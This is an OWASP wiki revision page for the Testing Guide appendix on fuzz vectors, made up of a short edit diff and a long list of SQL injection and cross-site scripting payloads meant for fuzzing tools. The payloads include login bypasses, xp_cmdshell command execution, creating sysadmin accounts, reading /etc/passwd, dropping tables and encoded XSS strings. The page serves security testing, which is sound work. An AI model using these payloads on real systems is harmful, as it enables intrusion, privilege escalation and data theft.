Difference between revisions of "OWASP Testing Guide Appendix C: Fuzz Vectors"

m (did some fix on code)
Line 52: Line 52:
 
<nowiki>INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))</nowiki><br>
 
<nowiki>INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))</nowiki><br>
 
<nowiki>CRATE USER name IDENTIFIED BY 'pass123'</nowiki><br>
 
<nowiki>CRATE USER name IDENTIFIED BY 'pass123'</nowiki><br>
<nowiki>CRATEUSER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; </nowiki><br>
+
<nowiki>CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; </nowiki><br>
 
<nowiki>GRANT CONNECT TO name; GRANT RESOURCE TO name;</nowiki><br>
 
<nowiki>GRANT CONNECT TO name; GRANT RESOURCE TO name;</nowiki><br>
 
<nowiki>' union select 1,load_file('/etc/passwd'),1,1,1;</nowiki><br>
 
<nowiki>' union select 1,load_file('/etc/passwd'),1,1,1;</nowiki><br>
Line 77: Line 77:
 
<nowiki><IMG SRC=javascript:alert('XSS')></nowiki><br>
 
<nowiki><IMG SRC=javascript:alert('XSS')></nowiki><br>
 
<nowiki><IMG SRC=JaVaScRiPt:alert('XSS')> </nowiki><br>
 
<nowiki><IMG SRC=JaVaScRiPt:alert('XSS')> </nowiki><br>
<nowiki><IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)></nowiki><br>
+
<nowiki><IMG SRC=JaVaScRiPt:alert(&amp;quot;XSS<WBR>&amp;quot;)></nowiki><br>
<nowiki><IMG SRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41></nowiki><br>
+
<nowiki><IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;<WBR>#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;<WBR>#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;<WBR>#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83<WBR>;&amp;#83;&amp;#39;&amp;#41></nowiki><br>
 
<nowiki><IMG
 
<nowiki><IMG
 
SRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041></nowiki><br>
 
SRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041></nowiki><br>
 
<nowiki><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29></nowiki><br>
 
<nowiki><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29></nowiki><br>
<nowiki><IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"></nowiki><br>
+
<nowiki><IMG SRC="jav&amp;#x09;ascript:alert(<WBR>'XSS');"></nowiki><br>
<nowiki><IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"></nowiki><br>
+
<nowiki><IMG SRC="jav&amp;#x0A;ascript:alert(<WBR>'XSS');"></nowiki><br>
<nowiki><IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"></nowiki><br>
+
<nowiki><IMG SRC="jav&amp;#x0D;ascript:alert(<WBR>'XSS');"></nowiki><br>
  
  
 
{{Category:OWASP Testing Project AoC}}
 
{{Category:OWASP Testing Project AoC}}

Revision as of 13:55, 16 November 2006



The following are fuzzing vectors which can be used with WebScarab or another fuzzer. Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally, one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered, identifying and exploiting a potential vulnerability is where skill is required. The list below mixes SQL injection and cross-site scripting probes, some of them URL-encoded, and a few of the SQL vectors change state (adding logins, creating or dropping a table) rather than only provoking an error:

' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
>"><script>alert("XSS")</script>&
"><STYLE>@import"javascript:alert('XSS')";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
">
>"
'';!--"<XSS>=&{()}
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)--
' ; drop table temp --
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))
CRATE USER name IDENTIFIED BY 'pass123'
CRATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
GRANT CONNECT TO name; GRANT RESOURCE TO name;
' union select 1,load_file('/etc/passwd'),1,1,1;
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
'/**/OR/**/1/**/=/**/1
' or 1/*
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
<IMG SRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
<IMG SRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">



OWASP Testing Guide v2

Here is the OWASP Testing Guide v2 Table of Contents